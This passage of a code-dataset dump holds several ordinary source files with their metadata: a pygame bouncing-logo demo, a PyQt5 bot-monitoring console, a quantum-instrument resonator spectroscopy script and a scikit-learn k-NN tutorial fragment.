"tensorflow.greater_equal", "line_number": 734, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 755, "usage_type": "call"}, {"api_name": "tensorflow.abs", "line_number": 759, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 759, "usage_type": "call"}, {"api_name": "tensorflow.experimental.numpy.diff", "line_number": 759, "usage_type": "call"}, {"api_name": "tensorflow.experimental", "line_number": 759, "usage_type": "attribute"}, {"api_name": "tensorflow.argmax", "line_number": 764, "usage_type": "call"}, {"api_name": "tensorflow.gather", "line_number": 765, "usage_type": "call"}, {"api_name": "tensorflow.greater", "line_number": 767, "usage_type": "call"}, {"api_name": "tensorflow.stack", "line_number": 768, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 768, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 768, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 770, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 776, "usage_type": "call"}, {"api_name": "tensorflow.function", "line_number": 627, "usage_type": "call"}, {"api_name": "tensorflow.TensorArray", "line_number": 786, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 786, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 788, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 788, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 790, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 790, "usage_type": "attribute"}, {"api_name": "tensorflow.TensorArray", "line_number": 792, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 792, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 796, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 796, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 800, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 815, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 816, "usage_type": "call"}, {"api_name": "tensorflow.range", "line_number": 821, "usage_type": "call"}, {"api_name": "tensorflow.where", "line_number": 826, 
"usage_type": "call"}, {"api_name": "tensorflow.equal", "line_number": 826, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 826, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 826, "usage_type": "attribute"}, {"api_name": "tensorflow.gather", "line_number": 827, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 828, "usage_type": "call"}, {"api_name": "tensorflow.function", "line_number": 781, "usage_type": "call"}, {"api_name": "tensorflow.io.read_file", "line_number": 863, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 863, "usage_type": "attribute"}, {"api_name": "tensorflow.io.decode_image", "line_number": 864, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 864, "usage_type": "attribute"}, {"api_name": "tensorflow.uint8", "line_number": 864, "usage_type": "attribute"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 865, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 865, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 866, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 866, "usage_type": "attribute"}, {"api_name": "tensorflow.RaggedTensor.from_tensor", "line_number": 872, "usage_type": "call"}, {"api_name": "tensorflow.RaggedTensor", "line_number": 872, "usage_type": "attribute"}, {"api_name": "tensorflow.int32", "line_number": 872, "usage_type": "attribute"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 875, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 875, "usage_type": "attribute"}, {"api_name": "tensorflow.RaggedTensor.from_tensor", "line_number": 876, "usage_type": "call"}, {"api_name": "tensorflow.RaggedTensor", "line_number": 876, "usage_type": "attribute"}, {"api_name": "tensorflow.int32", "line_number": 876, "usage_type": "attribute"}, {"api_name": "tensorflow.convert_to_tensor", "line_number": 881, "usage_type": "call"}, {"api_name": "tensorflow.one_hot", "line_number": 882, "usage_type": "call"}, {"api_name": "tensorflow.RaggedTensor.from_tensor", "line_number": 883, "usage_type": "call"}, {"api_name": "tensorflow.RaggedTensor", "line_number": 883, "usage_type": "attribute"}, {"api_name": "tensorflow.int32", "line_number": 884, "usage_type": "attribute"}]} +{"seq_id": "23674110279", "text": "'''\nCS 150 Introduction to OOP\n\nDemos a bouncing photo\n'''\nimport pygame\n\n# Specify the width and height of the screen for the game\nSCREEN_WIDTH = 1080\nSCREEN_HEIGHT = 720\n\n# Photo to display\nPHOTO = 'DVD.png' # 'red_logo.png'\n\n# Frames-Per-Second for game updates\nFPS = 60\n\nclass Box():\n def __init__(self):\n self.rect = pygame.Rect(0, 180, 320, 191)\n self.velocity = [200,200]\n img = pygame.image.load(PHOTO)\n self.image = pygame.transform.scale(img, self.rect.size)\n \n def update(self,dt):\n self.rect.x += self.velocity[0]*dt\n self.rect.y += self.velocity[1]*dt\n \n # Use the relevant attributes to check if rectangle has hit the edges\n # of the screen (0,0 is the upper left corner)\n if (self.rect.left < 0 or self.rect.right > SCREEN_WIDTH):\n self.velocity[0] *= -1\n if (self.rect.top < 0 or self.rect.bottom > SCREEN_HEIGHT):\n self.velocity[1] *= -1\n \n def render(self, display):\n # Show the bouncing object at the current location\n display.blit(self.image, self.rect)\n\ndef play_game():\n # Initialize pygame\n pygame.init()\n pygame.font.init()\n\n # Initialize the screen\n screen = pygame.display.set_mode( 
(SCREEN_WIDTH,SCREEN_HEIGHT) )\n\n # Initialize game elements\n box = Box()\n\n # Initialize some game variables\n time = 0\n delta_t = 1/FPS\n\n # Setup the font and clock\n font = pygame.font.SysFont('Arial',14)\n clock = pygame.time.Clock()\n\n # Main game loop\n while True:\n \n # Get the event corresponding to user input\n event = pygame.event.poll()\n if event.type == pygame.QUIT:\n break\n\n # Draw the scene\n screen.fill((255,255,255)) # Fill the scene with white (specified by RGB tuple)\n\n box.update(delta_t) # Update the position of the box\n box.render(screen) # Show the bouncing object\n\n # Update and draw the current time in the bottom left corner\n time += delta_t\n text = font.render('Time=' + str(round(time,1)) + ' seconds',True,(0,0,0))\n screen.blit(text,(10,0.95*SCREEN_HEIGHT))\n\n # Update the screen\n pygame.display.update()\n clock.tick(FPS)\n\n pygame.quit()\n\n\n", "repo_name": "Norvoke/middcs150", "sub_path": "Week 11/logo_pygame.py", "file_name": "logo_pygame.py", "file_ext": "py", "file_size_in_byte": 2270, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.Rect", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.image.load", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.transform.scale", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.transform", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.init", "line_number": 42, "usage_type": "call"}, {"api_name": "pygame.font.init", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.font.SysFont", "line_number": 56, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pygame.time.Clock", "line_number": 57, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pygame.event.poll", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 64, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 82, "usage_type": "call"}]} +{"seq_id": "72764017769", "text": "import io\nimport json\nimport logging\nimport os\nimport sys\nimport time\n\nimport dotenv\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom PyQt5 import QtGui, QtCore\nfrom PyQt5.QtCore import Qt, QThread, pyqtSignal, QObject\nfrom PyQt5.QtGui import QImage, QPixmap, QFontDatabase, QFont\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\nfrom PyQt5.uic import loadUi\n\nfrom requesters import GetRequester, PostRequester, Vars\nimport resources\n\nCHART_WIDTH = 320\n\n\nclass GetHandler(QObject):\n done = pyqtSignal(object)\n getter = GetRequester(os.environ.get('APPLICATION_URL'))\n\n def loop(self):\n while True:\n response = self.getter.response\n self.done.emit(response)\n\n time.sleep(0.3)\n\n\nclass PostHandler(QObject):\n done = pyqtSignal(object)\n poster = 
PostRequester(os.environ.get('APPLICATION_URL'))\n\n def post(self, instruction):\n res = self.poster.post(instruction)\n if not res.ok:\n pass\n\n self.done.emit(res.status_code)\n\n\nclass MainWindow(QMainWindow):\n def __init__(self):\n super(MainWindow, self).__init__()\n loadUi('main.ui', self)\n\n self._logger = logging.getLogger('index')\n self.pageList = ['homePage', 'logsPage']\n\n self.initUi()\n\n self._thread = QThread()\n\n self.get_handler = GetHandler()\n self.get_handler.done.connect(self.onRequestReady)\n\n self.post_handler = PostHandler()\n\n self.post_handler.moveToThread(self._thread)\n self.get_handler.moveToThread(self._thread)\n\n self._thread.started.connect(self.get_handler.loop)\n\n self.latency_log = [-2 for _ in range(10)]\n self.memory_usage_log = [-2 for _ in range(10)]\n\n self._thread.start()\n\n def closeEvent(self, event: QtGui.QCloseEvent) -> None:\n self._logger.info('Closing MainWindow')\n super().closeEvent(event)\n self._logger.info('MainWindow has been successfully closed')\n\n def initUi(self):\n self._logger.info('Initializing MainWindow\\'s UI')\n\n # Navigation\n for i in ['home', 'logs']:\n eval(f'self.{i}').clicked.connect(self.onNavChecked)\n\n # Bot controls\n for i in ['launch', 'terminate', 'restart']:\n eval(f'self.{i}').clicked.connect(self.onControlBtnClick)\n\n # Window controls\n self.close_btn.clicked.connect(self.close)\n self.minimize_btn.clicked.connect(self.showMinimized)\n self.maximize_btn.clicked.connect(self.maximizeEvent)\n\n self.topBar.mouseMoveEvent = self.moveWindow\n\n # Other settings\n self.setWindowFlag(QtCore.Qt.WindowType.FramelessWindowHint)\n self.setAttribute(QtCore.Qt.WidgetAttribute.WA_TranslucentBackground)\n\n self._logger.info('Initialized UI, starting application...')\n\n def maximizeEvent(self):\n if self.isMaximized():\n self.centralWidget().setStyleSheet(\n '#centralwidget {\\n'\n 'background-color: rgb(244, 152, 128);\\n'\n 'border: 1px transparent;\\n'\n 'border-radius: 20px;\\n'\n '}')\n self.maximize_btn.setToolTip('Maximize')\n self.showNormal()\n else:\n self.centralWidget().setStyleSheet(\n '#centralwidget {\\n'\n 'background-color: rgb(244, 152, 128);\\n'\n 'border: none;\\n'\n '}')\n self.maximize_btn.setToolTip('Restore')\n self.showMaximized()\n\n def moveWindow(self, event):\n if event.buttons() == Qt.LeftButton:\n if self.isMaximized():\n self.maximizeEvent()\n\n self.move(self.pos() + event.globalPos() - self.dragPos)\n self.dragPos = event.globalPos()\n event.accept()\n\n def mousePressEvent(self, event: QtGui.QMouseEvent) -> None:\n self.dragPos = event.globalPos()\n\n def onRequestReady(self, signal: dict):\n if signal is None:\n return\n\n self.updateLogs(signal)\n self.updateStatus(signal)\n self.updateVars(signal)\n\n def updateVars(self, signal: dict):\n vars_: Vars = signal['vars']\n data = json.loads(vars_.json())\n cpu, servers, memory = data.values()\n memory = float(memory[:-1])\n\n self.servers.setText(f'Servers: {servers}')\n self.title_mem.setText(f'Memory: {memory:.2f} MB')\n self.title_lat.setText(f'CPU: {cpu:.2f}%')\n\n del self.memory_usage_log[0]\n self.memory_usage_log.append(round(memory, 2))\n\n del self.latency_log[0]\n self.latency_log.append(round(cpu, 2))\n\n # Memory usage chart\n fig: plt.Figure = plt.figure(figsize=(4, 4))\n y = self.memory_usage_log\n x = list(range(10))\n plt.bar(x, y, width=0.9, color='#bfbf01')\n plt.xticks(x)\n plt.ylim([0, 512])\n plt.margins(0.015, tight=True)\n plt.tight_layout()\n buffer = io.BytesIO()\n fig.savefig(buffer, 
format='png')\n plt.close(fig)\n\n img = Image.open(buffer, formats=['png'])\n img = img.resize((CHART_WIDTH, CHART_WIDTH))\n pixmap = self.convertImage(img)\n self.memory.setPixmap(pixmap)\n\n # Latency changes chart\n fig: plt.Figure = plt.figure(figsize=(4, 4))\n y = self.latency_log\n x = list(range(10))\n plt.bar(x, y, width=0.9, color='#bfbf01')\n plt.xticks(x)\n plt.ylim([0, 0.5])\n plt.margins(0.015, tight=True)\n plt.tight_layout()\n buffer = io.BytesIO()\n fig.savefig(buffer, format='png')\n plt.close(fig)\n\n img = Image.open(buffer, formats=['png'])\n img = img.resize((CHART_WIDTH, CHART_WIDTH))\n pixmap = self.convertImage(img)\n self.latency.setPixmap(pixmap)\n\n @staticmethod\n def convertImage(im):\n im2 = im.convert('RGBA')\n data = im2.tobytes('raw', 'RGBA')\n qim = QImage(data, im.size[0], im.size[1], QImage.Format_ARGB32)\n pixmap = QPixmap.fromImage(qim)\n return pixmap\n\n def updateLogs(self, signal: dict):\n self.logger.setPlainText(signal['log'].content)\n self.logger.moveCursor(QtGui.QTextCursor.End)\n\n def updateStatus(self, signal: dict):\n self.status.setText(\n f'Bot status:\\n{signal[\"status\"]}'\n )\n\n def onControlBtnClick(self):\n instruction = self.sender().objectName()\n self.post_handler.post(instruction)\n\n def onNavChecked(self):\n page = self.sender().objectName() + 'Page'\n self.pages.setCurrentIndex(self.pageList.index(page))\n\n\ndef hook(*args):\n sys.__excepthook__(*args)\n\n\nif __name__ == '__main__':\n dotenv.load_dotenv('./.env')\n pyqt_plugins = 'venv/Lib/site-packages/PyQt5/Qt5/plugins/platforms'\n os.environ['QT_QPA_PLATFORM_PLUGIN_PATH'] = pyqt_plugins\n\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(levelname)s - %(name)s:\\t%(message)s',\n datefmt='%y.%b.%Y %H:%M:%S')\n\n app = QApplication([])\n QFontDatabase.addApplicationFont('sources/fonts/Montserrat-Regular.ttf')\n window = MainWindow()\n sys.__excepthook__ = hook\n\n window.show()\n app.exec()\n\n del window, app\n", "repo_name": "l4blee/nosok-bot_console", "sub_path": "index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 7257, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt5.QtCore.QObject", "line_number": 23, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 24, "usage_type": "call"}, {"api_name": "requesters.GetRequester", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 25, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 25, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 32, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QObject", "line_number": 35, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.pyqtSignal", "line_number": 36, "usage_type": "call"}, {"api_name": "requesters.PostRequester", "line_number": 37, "usage_type": "call"}, {"api_name": "os.environ.get", "line_number": 37, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 37, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QMainWindow", "line_number": 47, "usage_type": "name"}, {"api_name": "PyQt5.uic.loadUi", "line_number": 50, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 52, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QThread", "line_number": 57, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QCloseEvent", "line_number": 74, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui", "line_number": 74, "usage_type": 
"name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 98, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 98, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 99, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 99, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt.LeftButton", "line_number": 123, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 123, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QMouseEvent", "line_number": 131, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui", "line_number": 131, "usage_type": "name"}, {"api_name": "requesters.Vars", "line_number": 143, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 144, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 159, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.margins", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 171, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.Figure", "line_number": 177, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 180, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.margins", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 189, 
"usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 189, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QImage", "line_number": 198, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QImage.Format_ARGB32", "line_number": 198, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui.QPixmap.fromImage", "line_number": 199, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QPixmap", "line_number": 199, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QTextCursor", "line_number": 204, "usage_type": "attribute"}, {"api_name": "PyQt5.QtGui", "line_number": 204, "usage_type": "name"}, {"api_name": "sys.__excepthook__", "line_number": 221, "usage_type": "call"}, {"api_name": "dotenv.load_dotenv", "line_number": 225, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 227, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 229, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 229, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 233, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QFontDatabase.addApplicationFont", "line_number": 234, "usage_type": "call"}, {"api_name": "PyQt5.QtGui.QFontDatabase", "line_number": 234, "usage_type": "name"}, {"api_name": "sys.__excepthook__", "line_number": 236, "usage_type": "attribute"}]} +{"seq_id": "27115300850", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 27 15:37:41 2022\n\n@author: zhinst\n\nRequirements:\n\n LabOne Version >= 22.02\n Instruments: 1 x SHFQC Instrument\n\n\"\"\"\n# In[1]\n\nfrom zhinst.toolkit import Session, SHFQAChannelMode\n\nsession = Session(\"localhost\")\ndevice = session.connect_device(\"DEV12131\")\n\n# In[2] Parameter\n\nnumber_of_qubits = 1\n\nqachannel_center_frequency = 6.4e9\nqachannel_power_in = -50\nqachannel_power_out = -30\n\nmax_amplitude_readout = 1 / number_of_qubits # * 0.98\n\n# Sweep Parameter\nqubit_readout_frequencies = [-1e6]\nqubit_readout_widths = [4e6]\nnumber_amplitude_values = 20\naverage_factor = 1e-6 # if set to 1, scales averages with amplitude\n\n# In[3] Device configuration\n\ndevice.qachannels[0].configure_channel(\n center_frequency=qachannel_center_frequency,\n input_range=qachannel_power_in,\n output_range=qachannel_power_out,\n mode=SHFQAChannelMode.SPECTROSCOPY,\n)\n\n# In[4] Sweeper configuration\n\n# initiates sweeper parameters\nsweeper = session.modules.shfqa_sweeper\nsweeper.device(device)\n\nsweeper.rf.center_freq(qachannel_center_frequency)\nsweeper.rf.input_range(qachannel_power_in)\nsweeper.rf.output_range(qachannel_power_out)\n\n# sweeper.sweep.start_freq(-700e6)\n# sweeper.sweep.stop_freq(700e6)\nsweeper.sweep.num_points(3001)\nsweeper.sweep.mapping(\"linear\")\nsweeper.sweep.oscillator_gain(max_amplitude_readout)\nsweeper.sweep.mode(True)\n\nsweeper.average.integration_time(1000e-6)\nsweeper.average.num_averages(1)\nsweeper.average.mode(\"cyclic\")\n\n# In[5] Measure each resonator with different powers\n\nimport sys\nimport os\nimport numpy as np\n\nresonator_spectrum_data = {\"qubits\": [[]] * number_of_qubits}\nrelative_amplitude_values = np.linspace(\n max_amplitude_readout / number_amplitude_values,\n max_amplitude_readout,\n number_amplitude_values,\n)\n\ndevice.qachannels[0].input.on(1)\ndevice.qachannels[0].output.on(1)\n\nprint(f\"sweep {number_of_qubits} qubits at {number_amplitude_values} amplitudes\")\n\nfor qubit in range(number_of_qubits):\n sweeper.sweep.start_freq(\n qubit_readout_frequencies[qubit] - qubit_readout_widths[qubit]\n )\n 
sweeper.sweep.stop_freq(\n qubit_readout_frequencies[qubit] + qubit_readout_widths[qubit]\n )\n\n for i, amplitude in enumerate(relative_amplitude_values):\n sweeper.sweep.oscillator_gain(amplitude)\n sweeper.average.num_averages(int(np.ceil(average_factor * 1 / amplitude ** 2)))\n print(\n f\"qubit: {qubit+1} amp: {amplitude:.5f} ({i+1}/{number_amplitude_values})\",\n end=\"\\r\",\n )\n old_stdout = sys.stdout # backup current stdout\n sys.stdout = open(os.devnull, \"w\")\n resonator_spectrum_data[\"qubits\"][qubit].append(sweeper.run())\n sys.stdout = old_stdout # reset old stdout\n\ndevice.qachannels[0].input.on(0)\ndevice.qachannels[0].output.on(0)\n\n# In[6] Plot the data for each qubit\n\n#resonator_spectrum_data['qubits'][0]==resonator_spectrum_data['qubits'][1]\n\nimport matplotlib.pyplot as plt\nfrom shfqc_helper import voltage_to_power_dBm\n\nfont_large=15\nfont_medium=10\n\nnum_points = sweeper.sweep.num_points()\n\nfor qubit in range(number_of_qubits):\n number_amplitude_values = np.size(relative_amplitude_values)\n x_data = np.zeros((number_amplitude_values, num_points))\n y_data = np.zeros((number_amplitude_values, num_points))\n z_data = np.zeros((number_amplitude_values, num_points), dtype=complex)\n slope_array = np.zeros((number_amplitude_values, num_points))\n\n for amp_ind, amplitude in enumerate(relative_amplitude_values):\n spec_path = resonator_spectrum_data[\"qubits\"][qubit][qubit*number_of_qubits+amp_ind]\n spec_path_props = spec_path[\"properties\"]\n\n z_data[amp_ind] = spec_path[\"vector\"]\n\n \n fig = plt.figure()\n fig.suptitle(f\"Qubit {qubit+1}, amplitude [dBm]\", fontsize=font_large)\n plt_extent = [qachannel_center_frequency+spec_path_props[\"startfreq\"],\n qachannel_center_frequency+spec_path_props[\"stopfreq\"],\n np.max(relative_amplitude_values), np.min(relative_amplitude_values)]\n \n plt.imshow(voltage_to_power_dBm(abs(z_data)), aspect = 'auto', extent = plt_extent)\n \n plt.ylabel('Readout amplitude (a.u.)')\n plt.xlabel('Frequency (Hz)')\n plt.colorbar()\n\n plt.show()\n", "repo_name": "asqum/PYQUM", "sub_path": "TEST/BETAsite/RS/ZI_SHFQC/shfqc_resonator_spectroscopy_cw_power.py", "file_name": "shfqc_resonator_spectroscopy_cw_power.py", "file_ext": "py", "file_size_in_byte": 4272, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "zhinst.toolkit.Session", "line_number": 17, "usage_type": "call"}, {"api_name": "zhinst.toolkit.SHFQAChannelMode.SPECTROSCOPY", "line_number": 42, "usage_type": "attribute"}, {"api_name": "zhinst.toolkit.SHFQAChannelMode", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 94, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 99, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 100, "usage_type": "attribute"}, {"api_name": "os.devnull", "line_number": 100, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 102, "usage_type": "attribute"}, {"api_name": "numpy.size", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 133, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 133, "usage_type": "name"}, {"api_name": "numpy.max", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "shfqc_helper.voltage_to_power_dBm", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 142, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 142, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.colorbar", "line_number": 143, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 143, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}]} +{"seq_id": "72524121447", "text": "###Classifiers\n###EDA functions\n#import seaborn as sns\n#sns.heatmap(df.corr(), square=True, cmap='RdYlGn')\n###KNN\nfrom sklearn import datasets\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\n\ndigits = datasets.load_digits()\n#print(digits.DESCR)\n#print(digits.keys())\n#print(digits.images.shape)\n#print(digits.data.shape)\n#plt.imshow(digits.images[1010], cmap=plt.cm.gray_r, interpolation='nearest')\n#plt.show()\n\nX = digits.data\ny = digits.target\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state=42, stratify=digits.target)\n\nneighbors = np.arange(1, 9)\ntrain_accuracy = np.empty(len(neighbors))\ntest_accuracy = np.empty(len(neighbors))\n\nfor i, k in enumerate(neighbors):\n knn = KNeighborsClassifier(n_neighbors=k)\n knn.fit(X_train,y_train)\n train_accuracy[i] = knn.score(X_train, y_train)\n test_accuracy[i] = knn.score(X_test, y_test)\n \n# Generate plot\nplt.title('k-NN: Varying Number of Neighbors')\nplt.plot(neighbors, test_accuracy, label = 'Testing Accuracy')\nplt.plot(neighbors, train_accuracy, label = 'Training Accuracy')\nplt.legend()\nplt.xlabel('Number of Neighbors')\nplt.ylabel('Accuracy')\nplt.show()\n#Hyparparameters search###\nfrom sklearn.model_selection import GridSearchCV\n\n# Setup the hyperparameter grid\nknn = KNeighborsClassifier()\nparam_grid = {'n_neighbors': np.arange(1,50)}\nknn_cv = GridSearchCV(knn, param_grid, cv=5)\nknn_cv.fit(X_train, y_train)\nprint(\"Tuned knn: {}\".format(knn_cv.best_params_))\nprint(\"Best score is {}\".format(knn_cv.best_score_))\n\n#Metrics of the Classifier###\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import confusion_matrix\n\ny_pred = knn.predict(X_test)\n\n# Generate the confusion matrix and classification report\nprint(confusion_matrix(y_test, y_pred))\nprint(classification_report(y_test, y_pred))\n\n\n###Regressions\nimport numpy as np\nimport pandas as pd\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\n\ndf = 